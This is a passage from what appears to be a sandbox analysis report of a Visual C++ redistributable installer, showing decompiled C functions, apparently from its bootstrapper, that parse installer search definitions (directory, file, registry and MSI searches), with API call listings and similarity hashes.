                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E00059814(_t3, _t5, _t7, 0x780c4, 0x7a964); // executed
                                                                          				goto __eax;
                                                                          			}







                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000594E7
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: e631eb56e297c4822fd9507c783f8cdb8a499e836c9c1fa22017d5adf0597f0e
                                                                          • Instruction ID: 0b5892dda75d9bf262b615cc52773c03e9b124480915a1c677bfbdf5b5447fd6
                                                                          • Opcode Fuzzy Hash: e631eb56e297c4822fd9507c783f8cdb8a499e836c9c1fa22017d5adf0597f0e
                                                                          • Instruction Fuzzy Hash: 09B01285BA8701EC329462546E07C7F010CC7C1F12330C22ABB08C6181EC4C0C0F5136
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E000114B2(unsigned int _a4, WCHAR* _a8, unsigned int _a12, intOrPtr _a16) {
                                                                          				unsigned int _t9;
                                                                          				signed int _t10;
                                                                          				signed int _t13;
                                                                          				signed int _t14;
                                                                          				unsigned int _t15;
                                                                          				void* _t16;
                                                                          				unsigned int _t18;
                                                                          				unsigned int _t20;
                                                                          				unsigned int _t21;
                                                                          
                                                                          				_t9 = _a4;
                                                                          				_t20 = 0;
                                                                          				_t14 = _t13 | 0xffffffff;
                                                                          				if( *_t9 == 0) {
                                                                          					L4:
                                                                          					_t18 = _a12;
                                                                          					if(_t18 == 0) {
                                                                          						_t9 = lstrlenW(_a8);
                                                                          						_t18 = _t9;
                                                                          					}
                                                                          					_t4 = _t18 + 1; // 0x1
                                                                          					_t16 = _t4;
                                                                          					_t15 =  >=  ? _t16 : _t14;
                                                                          					asm("sbb eax, eax");
                                                                          					_t10 = _t9 & 0x80070216;
                                                                          					if(_t16 < _t18) {
                                                                          						L10:
                                                                          						return _t10;
                                                                          					} else {
                                                                          						if(_t20 >= _t15) {
                                                                          							L9:
                                                                          							_t10 = E00011A6E(_t16,  *_a4, _t20, _a8, _t18, 0, 0, 0x200);
                                                                          							goto L10;
                                                                          						}
                                                                          						_t20 = _t15;
                                                                          						_t10 = E0001143C(_a4, _t15, _a16); // executed
                                                                          						if(_t10 < 0) {
                                                                          							goto L10;
                                                                          						}
                                                                          						goto L9;
                                                                          					}
                                                                          				}
                                                                          				_t9 = E00013B51( *_t9);
                                                                          				_t21 = _t9;
                                                                          				if(_t21 != _t14) {
                                                                          					_t20 = _t21 >> 1;
                                                                          					goto L4;
                                                                          				}
                                                                          				return 0x80070057;
                                                                          			}













                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,000121B8,?,00000000,?,00000000,?,000138BD,00000000,?,00000104), ref: 000114E4
                                                                            • Part of subcall function 00013B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B59
                                                                            • Part of subcall function 00013B51: HeapSize.KERNEL32(00000000,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B60
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ProcessSizelstrlen
                                                                          • String ID:
                                                                          • API String ID: 3492610842-0
                                                                          • Opcode ID: 8c295997f363e74d5b8ec7bbeedb7e5fdef64d192335a78e198d8aa371f41520
                                                                          • Instruction ID: dc29cd323083e659d17735f060287d560a0a20a898f5977d50a1cc014edee2fd
                                                                          • Opcode Fuzzy Hash: 8c295997f363e74d5b8ec7bbeedb7e5fdef64d192335a78e198d8aa371f41520
                                                                          • Instruction Fuzzy Hash: C8012837200628EFCF255E54DC84FDE7796AF41B64F214225FB259B161D731EC909690
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 74%
                                                                          			E0001A7EF(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
                                                                          				int _v8;
                                                                          				int _v12;
                                                                          				int _v16;
                                                                          				int _v20;
                                                                          				void* _v24;
                                                                          				intOrPtr _v28;
                                                                          				intOrPtr* _t139;
                                                                          				short* _t142;
                                                                          				intOrPtr _t150;
                                                                          				int _t151;
                                                                          				int _t162;
                                                                          				int _t176;
                                                                          				intOrPtr _t178;
                                                                          				int _t183;
                                                                          				int _t189;
                                                                          				int _t199;
                                                                          				int _t216;
                                                                          				int _t222;
                                                                          				int _t229;
                                                                          				int _t234;
                                                                          				int _t235;
                                                                          				intOrPtr* _t242;
                                                                          				int _t243;
                                                                          				intOrPtr* _t244;
                                                                          				intOrPtr _t247;
                                                                          				intOrPtr* _t248;
                                                                          				intOrPtr _t249;
                                                                          				intOrPtr _t253;
                                                                          				intOrPtr _t255;
                                                                          				intOrPtr _t256;
                                                                          				void* _t257;
                                                                          				void* _t261;
                                                                          				int _t263;
                                                                          
                                                                          				_v24 = 0;
                                                                          				_v12 = 0;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_v8 = 0;
                                                                          				if(E00053803(_a8, L"DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch",  &_v24) >= 0) {
                                                                          					_t139 = _v24;
                                                                          					_t263 =  *((intOrPtr*)( *_t139 + 0x20))(_t139,  &_v20);
                                                                          					if(_t263 >= 0) {
                                                                          						_t141 = _v20;
                                                                          						if(_v20 != 0) {
                                                                          							_t150 = E000138D4(_t141 * 0x2c, 1);
                                                                          							_t244 = _a4;
                                                                          							 *_t244 = _t150;
                                                                          							if(_t150 != 0) {
                                                                          								_t151 = _v20;
                                                                          								_t263 = 0;
                                                                          								 *((intOrPtr*)(_t244 + 4)) = _t151;
                                                                          								_a8 = 0;
                                                                          								if(_t151 != 0) {
                                                                          									_t253 = 0;
                                                                          									_v28 = 0;
                                                                          									while(1) {
                                                                          										_t261 =  *_t244 + _t253;
                                                                          										_t263 = E00053760(_t244, _v24,  &_v12,  &_v16);
                                                                          										if(_t263 < 0) {
                                                                          											break;
                                                                          										}
                                                                          										_t263 = E000531C7(_v12, L"Id", _t261);
                                                                          										if(_t263 < 0) {
                                                                          											_push("Failed to get @Id.");
                                                                          											goto L113;
                                                                          										} else {
                                                                          											_t263 = E000531C7(_v12, L"Variable", _t261 + 4);
                                                                          											if(_t263 < 0) {
                                                                          												_push("Failed to get @Variable.");
                                                                          												goto L113;
                                                                          											} else {
                                                                          												_t263 = E000531C7(_v12, L"Condition", _t261 + 8);
                                                                          												if(_t263 == 0x80070490 || _t263 >= 0) {
                                                                          													if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"DirectorySearch", 0xffffffff) != 2) {
                                                                          														_t162 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"FileSearch", 0xffffffff);
                                                                          														_t247 = 2;
                                                                          														if(_t162 != _t247) {
                                                                          															if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"RegistrySearch", 0xffffffff) != 2) {
                                                                          																if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"MsiComponentSearch", 0xffffffff) != 2) {
                                                                          																	if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"MsiProductSearch", 0xffffffff) != 2) {
                                                                          																		if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"MsiFeatureSearch", 0xffffffff) != 2) {
                                                                          																			_push(_v16);
                                                                          																			_t263 = 0x8000ffff;
                                                                          																			_push("Unexpected element name: %ls");
                                                                          																			_push(0x8000ffff);
                                                                          																			goto L109;
                                                                          																		} else {
                                                                          																			 *((intOrPtr*)(_t261 + 0xc)) = 6;
                                                                          																			_t263 = E000531C7(_v12, L"ProductCode", _t261 + 0x14);
                                                                          																			if(_t263 < 0) {
                                                                          																				goto L107;
                                                                          																			} else {
                                                                          																				_t263 = E000531C7(_v12, L"FeatureId", _t261 + 0x18);
                                                                          																				if(_t263 < 0) {
                                                                          																					_push("Failed to get @FeatureId.");
                                                                          																					goto L113;
                                                                          																				} else {
                                                                          																					_t263 = E000531C7(_v12, L"Type",  &_v8);
                                                                          																					if(_t263 < 0) {
                                                                          																						goto L105;
                                                                          																					} else {
                                                                          																						_t263 = 0;
                                                                          																						if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"state", 0xffffffff) != 2) {
                                                                          																							goto L103;
                                                                          																						} else {
                                                                          																							goto L83;
                                                                          																						}
                                                                          																					}
                                                                          																				}
                                                                          																			}
                                                                          																		}
                                                                          																	} else {
                                                                          																		 *((intOrPtr*)(_t261 + 0xc)) = 5;
                                                                          																		 *((intOrPtr*)(_t261 + 0x14)) = 0;
                                                                          																		_t263 = E000531C7(_v12, L"ProductCode", _t261 + 0x18);
                                                                          																		_t183 = 0x80070490;
                                                                          																		if(_t263 == 0x80070490) {
                                                                          																			_t263 = E000531C7(_v12, L"UpgradeCode", _t261 + 0x18);
                                                                          																			_t183 = 0x80070490;
                                                                          																			if(_t263 == 0x80070490) {
                                                                          																				goto L71;
                                                                          																			} else {
                                                                          																				if(_t263 < 0) {
                                                                          																					_push("Failed to get @UpgradeCode.");
                                                                          																					goto L113;
                                                                          																				} else {
                                                                          																					 *((intOrPtr*)(_t261 + 0x14)) = 2;
                                                                          																					goto L71;
                                                                          																				}
                                                                          																			}
                                                                          																		} else {
                                                                          																			if(_t263 < 0) {
                                                                          																				goto L107;
                                                                          																			} else {
                                                                          																				 *((intOrPtr*)(_t261 + 0x14)) = 1;
                                                                          																				L71:
                                                                          																				if( *((intOrPtr*)(_t261 + 0x14)) == 0) {
                                                                          																					_push("Failed to get @ProductCode or @UpgradeCode.");
                                                                          																					_t263 = _t183;
                                                                          																					_push(_t183);
                                                                          																					goto L114;
                                                                          																				} else {
                                                                          																					_t263 = E000531C7(_v12, L"Type",  &_v8);
                                                                          																					if(_t263 < 0) {
                                                                          																						goto L105;
                                                                          																					} else {
                                                                          																						_t263 = 0;
                                                                          																						if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"version", 0xffffffff) == 2) {
                                                                          																							goto L83;
                                                                          																						} else {
                                                                          																							_t189 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"language", 0xffffffff);
                                                                          																							_t255 = 2;
                                                                          																							if(_t189 == _t255) {
                                                                          																								goto L20;
                                                                          																							} else {
                                                                          																								if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"state", 0xffffffff) == 2) {
                                                                          																									goto L63;
                                                                          																								} else {
                                                                          																									if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"assignment", 0xffffffff) != 2) {
                                                                          																										goto L103;
                                                                          																									} else {
                                                                          																										 *((intOrPtr*)(_t261 + 0x10)) = 4;
                                                                          																										goto L84;
                                                                          																									}
                                                                          																								}
                                                                          																							}
                                                                          																						}
                                                                          																					}
                                                                          																				}
                                                                          																			}
                                                                          																		}
                                                                          																	}
                                                                          																} else {
                                                                          																	 *((intOrPtr*)(_t261 + 0xc)) = 4;
                                                                          																	_t263 = E000531C7(_v12, L"ProductCode", _t261 + 0x14);
                                                                          																	if(_t263 == 0x80070490 || _t263 >= 0) {
                                                                          																		_t263 = E000531C7(_v12, L"ComponentId", _t261 + 0x18);
                                                                          																		if(_t263 < 0) {
                                                                          																			_push("Failed to get @ComponentId.");
                                                                          																			goto L113;
                                                                          																		} else {
                                                                          																			_t263 = E000531C7(_v12, L"Type",  &_v8);
                                                                          																			if(_t263 < 0) {
                                                                          																				goto L105;
                                                                          																			} else {
                                                                          																				_t263 = 0;
                                                                          																				if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"keyPath", 0xffffffff) == 2) {
                                                                          																					goto L83;
                                                                          																				} else {
                                                                          																					_t199 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"state", 0xffffffff);
                                                                          																					_t255 = 2;
                                                                          																					if(_t199 == _t255) {
                                                                          																						goto L20;
                                                                          																					} else {
                                                                          																						_push(0xffffffff);
                                                                          																						_push(L"directory");
                                                                          																						goto L62;
                                                                          																					}
                                                                          																				}
                                                                          																			}
                                                                          																		}
                                                                          																	} else {
                                                                          																		L107:
                                                                          																		_push("Failed to get @ProductCode.");
                                                                          																		goto L113;
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																 *((intOrPtr*)(_t261 + 0xc)) = 3;
                                                                          																_t263 = E000531C7(_v12, L"Root",  &_v8);
                                                                          																if(_t263 < 0) {
                                                                          																	_push("Failed to get @Root.");
                                                                          																	goto L113;
                                                                          																} else {
                                                                          																	if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"HKCR", 0xffffffff) != 2) {
                                                                          																		if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"HKCU", 0xffffffff) != 2) {
                                                                          																			if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"HKLM", 0xffffffff) != 2) {
                                                                          																				if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"HKU", 0xffffffff) != 2) {
                                                                          																					_push(_v8);
                                                                          																					_push("Invalid value for @Root: %ls");
                                                                          																					goto L104;
                                                                          																				} else {
                                                                          																					 *((intOrPtr*)(_t261 + 0x18)) = 0x80000003;
                                                                          																					goto L37;
                                                                          																				}
                                                                          																			} else {
                                                                          																				 *((intOrPtr*)(_t261 + 0x18)) = 0x80000002;
                                                                          																				goto L37;
                                                                          																			}
                                                                          																		} else {
                                                                          																			 *((intOrPtr*)(_t261 + 0x18)) = 0x80000001;
                                                                          																			goto L37;
                                                                          																		}
                                                                          																	} else {
                                                                          																		 *((intOrPtr*)(_t261 + 0x18)) = 0x80000000;
                                                                          																		L37:
                                                                          																		_t263 = E000531C7(_v12, L"Key", _t261 + 0x1c);
                                                                          																		if(_t263 < 0) {
                                                                          																			_push("Failed to get Key attribute.");
                                                                          																			goto L113;
                                                                          																		} else {
                                                                          																			_t263 = E000531C7(_v12, L"Value", _t261 + 0x20);
                                                                          																			if(_t263 == 0x80070490 || _t263 >= 0) {
                                                                          																				_t263 = E000531C7(_v12, L"Type",  &_v8);
                                                                          																				if(_t263 < 0) {
                                                                          																					goto L105;
                                                                          																				} else {
                                                                          																					_t263 = E000533DB(_t247, _v12, L"Win64", _t261 + 0x24);
                                                                          																					if(_t263 == 0x80070490 || _t263 >= 0) {
                                                                          																						_t263 = 0;
                                                                          																						if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"exists", 0xffffffff) == 2) {
                                                                          																							goto L83;
                                                                          																						} else {
                                                                          																							_t216 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"value", 0xffffffff);
                                                                          																							_t249 = 2;
                                                                          																							if(_t216 != _t249) {
                                                                          																								goto L103;
                                                                          																							} else {
                                                                          																								 *((intOrPtr*)(_t261 + 0x10)) = _t249;
                                                                          																								_t263 = E000533DB(_t249, _v12, L"ExpandEnvironment", _t261 + 0x28);
                                                                          																								if(_t263 == 0x80070490 || _t263 >= 0) {
                                                                          																									_t263 = E000531C7(_v12, L"VariableType",  &_v8);
                                                                          																									if(_t263 < 0) {
                                                                          																										_push("Failed to get @VariableType.");
                                                                          																										goto L113;
                                                                          																									} else {
                                                                          																										_t263 = 0;
                                                                          																										if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"numeric", 0xffffffff) != 2) {
                                                                          																											_t222 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"string", 0xffffffff);
                                                                          																											_t256 = 2;
                                                                          																											if(_t222 != _t256) {
                                                                          																												if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"version", 0xffffffff) != 2) {
                                                                          																													_push(_v8);
                                                                          																													_push("Invalid value for @VariableType: %ls");
                                                                          																													goto L104;
                                                                          																												} else {
                                                                          																													 *((intOrPtr*)(_t261 + 0x14)) = 3;
                                                                          																													goto L84;
                                                                          																												}
                                                                          																											} else {
                                                                          																												 *((intOrPtr*)(_t261 + 0x14)) = _t256;
                                                                          																												goto L84;
                                                                          																											}
                                                                          																										} else {
                                                                          																											 *((intOrPtr*)(_t261 + 0x14)) = 1;
                                                                          																											goto L84;
                                                                          																										}
                                                                          																									}
                                                                          																								} else {
                                                                          																									_push("Failed to get @ExpandEnvironment.");
                                                                          																									goto L113;
                                                                          																								}
                                                                          																							}
                                                                          																						}
                                                                          																					} else {
                                                                          																						_push("Failed to get Win64 attribute.");
                                                                          																						goto L113;
                                                                          																					}
                                                                          																				}
                                                                          																			} else {
                                                                          																				_push("Failed to get Value attribute.");
                                                                          																				goto L113;
                                                                          																			}
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														} else {
                                                                          															 *((intOrPtr*)(_t261 + 0xc)) = _t247;
                                                                          															_t263 = E000531C7(_v12, L"Path", _t261 + 0x14);
                                                                          															if(_t263 < 0) {
                                                                          																goto L91;
                                                                          															} else {
                                                                          																_t263 = E000531C7(_v12, L"Type",  &_v8);
                                                                          																if(_t263 < 0) {
                                                                          																	goto L105;
                                                                          																} else {
                                                                          																	_t263 = 0;
                                                                          																	if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"exists", 0xffffffff) == 2) {
                                                                          																		goto L83;
                                                                          																	} else {
                                                                          																		_t229 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"version", 0xffffffff);
                                                                          																		_t255 = 2;
                                                                          																		if(_t229 == _t255) {
                                                                          																			goto L20;
                                                                          																		} else {
                                                                          																			_push(0xffffffff);
                                                                          																			_push(L"path");
                                                                          																			L62:
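                                                                          																			// The two unresolved arguments are the values pushed just before each jump to L62: L"directory" or L"path", followed by 0xffffffff.
                                                                          																			if(CompareStringW(0x7f, _t263, _v8, 0xffffffff, ??, ??) != 2) {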
                                                                          																				goto L103;
                                                                          																			} else {
                                                                          																				L63:
                                                                          																				 *((intOrPtr*)(_t261 + 0x10)) = 3;
                                                                          																				goto L84;
                                                                          																			}
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													} else {
                                                                          														 *((intOrPtr*)(_t261 + 0xc)) = 1;
                                                                          														_t263 = E000531C7(_v12, L"Path", _t261 + 0x14);
                                                                          														if(_t263 < 0) {
                                                                          															L91:
                                                                          															_push("Failed to get @Path.");
                                                                          															goto L113;
                                                                          														} else {
                                                                          															_t263 = E000531C7(_v12, L"Type",  &_v8);
                                                                          															if(_t263 < 0) {
                                                                          																L105:
                                                                          																_push("Failed to get @Type.");
                                                                          																goto L113;
                                                                          															} else {
                                                                          																_t263 = 0;
                                                                          																_t234 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"exists", 0xffffffff);
                                                                          																_t257 = 2;
                                                                          																if(_t234 == _t257) {
                                                                          																	L83:
                                                                          																	 *((intOrPtr*)(_t261 + 0x10)) = 1;
                                                                          																	goto L84;
                                                                          																} else {
                                                                          																	_t235 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"path", 0xffffffff);
                                                                          																	_t255 = 2;
                                                                          																	if(_t235 != _t255) {
                                                                          																		L103:
                                                                          																		_push(_v8);
                                                                          																		_push("Invalid value for @Type: %ls");
                                                                          																		L104:
                                                                          																		_t263 = 0x80070057;
                                                                          																		_push(0x80070057);
                                                                          																		L109:
                                                                          																		E0005012F();
                                                                          																	} else {
                                                                          																		L20:
                                                                          																		 *((intOrPtr*)(_t261 + 0x10)) = _t255;
                                                                          																		L84:
                                                                          																		_t248 = _v12;
                                                                          																		if(_t248 != 0) {
                                                                          																			 *((intOrPtr*)( *_t248 + 8))(_t248);
                                                                          																			_v12 = _t263;
                                                                          																		}
                                                                          																		_t176 = _v16;
                                                                          																		if(_t176 != 0) {
                                                                          																			__imp__#6(_t176);
                                                                          																			_v16 = _t263;
                                                                          																		}
                                                                          																		_t178 = _a8 + 1;
                                                                          																		_t253 = _v28 + 0x2c;
                                                                          																		_a8 = _t178;
                                                                          																		_v28 = _t253;
                                                                          																		if(_t178 < _v20) {
                                                                          																			_t244 = _a4;
                                                                          																			continue;
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												} else {
                                                                          													_push("Failed to get @Condition.");
                                                                          													L113:
                                                                          													_push(_t263);
                                                                          													L114:
                                                                          													E0005012F();
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										goto L115;
                                                                          									}
                                                                          									_push("Failed to get next node.");
                                                                          									goto L113;
                                                                          								}
                                                                          								L115:
                                                                          							} else {
                                                                          								_t263 = 0x8007000e;
                                                                          								E000137D3(_t150, "search.cpp", 0x4f, 0x8007000e);
                                                                          								_push("Failed to allocate memory for search structs.");
                                                                          								goto L2;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to get search node count.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to select search nodes.");
                                                                          					L2:
                                                                          					_push(_t263);
                                                                          					E0005012F();
                                                                          				}
                                                                          				_t242 = _v24;
                                                                          				if(_t242 != 0) {
                                                                          					 *((intOrPtr*)( *_t242 + 8))(_t242);
                                                                          				}
                                                                          				_t243 = _v12;
                                                                          				if(_t243 != 0) {
                                                                          					 *((intOrPtr*)( *_t243 + 8))(_t243);
                                                                          				}
                                                                          				_t142 = _v16;
                                                                          				if(_t142 != 0) {
                                                                          					__imp__#6(_t142);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t263;
                                                                          			}




































                                                                          0x0001ad23
                                                                          0x0001aa30
                                                                          0x0001aa14
                                                                          0x0001a9f8
                                                                          0x0001a9dd
                                                                          0x0001a92e
                                                                          0x0001a931
                                                                          0x0001a946
                                                                          0x0001a94a
                                                                          0x0001af30
                                                                          0x0001af30
                                                                          0x00000000
                                                                          0x0001a950
                                                                          0x0001a961
                                                                          0x0001a965
                                                                          0x0001afae
                                                                          0x0001afae
                                                                          0x00000000
                                                                          0x0001a96b
                                                                          0x0001a977
                                                                          0x0001a97c
                                                                          0x0001a980
                                                                          0x0001a983
                                                                          0x0001aedd
                                                                          0x0001aedd
                                                                          0x00000000
                                                                          0x0001a989
                                                                          0x0001a998
                                                                          0x0001a99c
                                                                          0x0001a99f
                                                                          0x0001af9c
                                                                          0x0001af9c
                                                                          0x0001af9f
                                                                          0x0001afa4
                                                                          0x0001afa9
                                                                          0x0001afab
                                                                          0x0001afd1
                                                                          0x0001afd1
                                                                          0x0001a9a5
                                                                          0x0001a9a5
                                                                          0x0001a9a5
                                                                          0x0001aee4
                                                                          0x0001aee4
                                                                          0x0001aee9
                                                                          0x0001aeee
                                                                          0x0001aef1
                                                                          0x0001aef1
                                                                          0x0001aef4
                                                                          0x0001aef9
                                                                          0x0001aefc
                                                                          0x0001af02
                                                                          0x0001af02
                                                                          0x0001af0b
                                                                          0x0001af0c
                                                                          0x0001af0f
                                                                          0x0001af12
                                                                          0x0001af18
                                                                          0x0001af1e
                                                                          0x00000000
                                                                          0x0001af1e
                                                                          0x0001af18
                                                                          0x0001a99f
                                                                          0x0001a983
                                                                          0x0001a965
                                                                          0x0001a94a
                                                                          0x0001af26
                                                                          0x0001af26
                                                                          0x0001afee
                                                                          0x0001afee
                                                                          0x0001afef
                                                                          0x0001afef
                                                                          0x0001aff5
                                                                          0x0001a90c
                                                                          0x0001a8ed
                                                                          0x00000000
                                                                          0x0001a8d2
                                                                          0x0001afe9
                                                                          0x00000000
                                                                          0x0001afe9
                                                                          0x0001aff6
                                                                          0x0001a869
                                                                          0x0001a869
                                                                          0x0001a876
                                                                          0x0001a87b
                                                                          0x00000000
                                                                          0x0001a87b
                                                                          0x0001a867
                                                                          0x0001a843
                                                                          0x0001a843
                                                                          0x00000000
                                                                          0x0001a843
                                                                          0x0001a81e
                                                                          0x0001a81e
                                                                          0x0001a823
                                                                          0x0001a823
                                                                          0x0001a824
                                                                          0x0001a82a
                                                                          0x0001aff8
                                                                          0x0001affd
                                                                          0x0001b002
                                                                          0x0001b002
                                                                          0x0001b005
                                                                          0x0001b00a
                                                                          0x0001b00f
                                                                          0x0001b00f
                                                                          0x0001b012
                                                                          0x0001b017
                                                                          0x0001b01a
                                                                          0x0001b01a
                                                                          0x0001b024
                                                                          0x0001b029
                                                                          0x0001b029
                                                                          0x0001b034

                                                                          APIs
                                                                          • SysFreeString.OLEAUT32(?), ref: 0001B01A
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,0005CA64,000000FF,DirectorySearch,000000FF,0005CA64,Condition,feclient.dll,0005CA64,Variable,?,0005CA64,0005CA64,?,?), ref: 0001A927
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0001A97C
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0001A998
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0001A9BC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0001AA0F
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0001AA29
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0001AA51
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0001AA8F
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0001AAAE
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0001AACD
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0001AB8B
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0001ABA5
                                                                            • Part of subcall function 000531C7: VariantInit.OLEAUT32(?), ref: 000531DD
                                                                            • Part of subcall function 000531C7: SysAllocString.OLEAUT32(?), ref: 000531F9
                                                                            • Part of subcall function 000531C7: VariantClear.OLEAUT32(?), ref: 00053280
                                                                            • Part of subcall function 000531C7: SysFreeString.OLEAUT32(00000000), ref: 0005328B
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0001AC04
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0001AC26
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0001AC46
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0001AD1E
                                                                          • SysFreeString.OLEAUT32(?), ref: 0001AEFC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
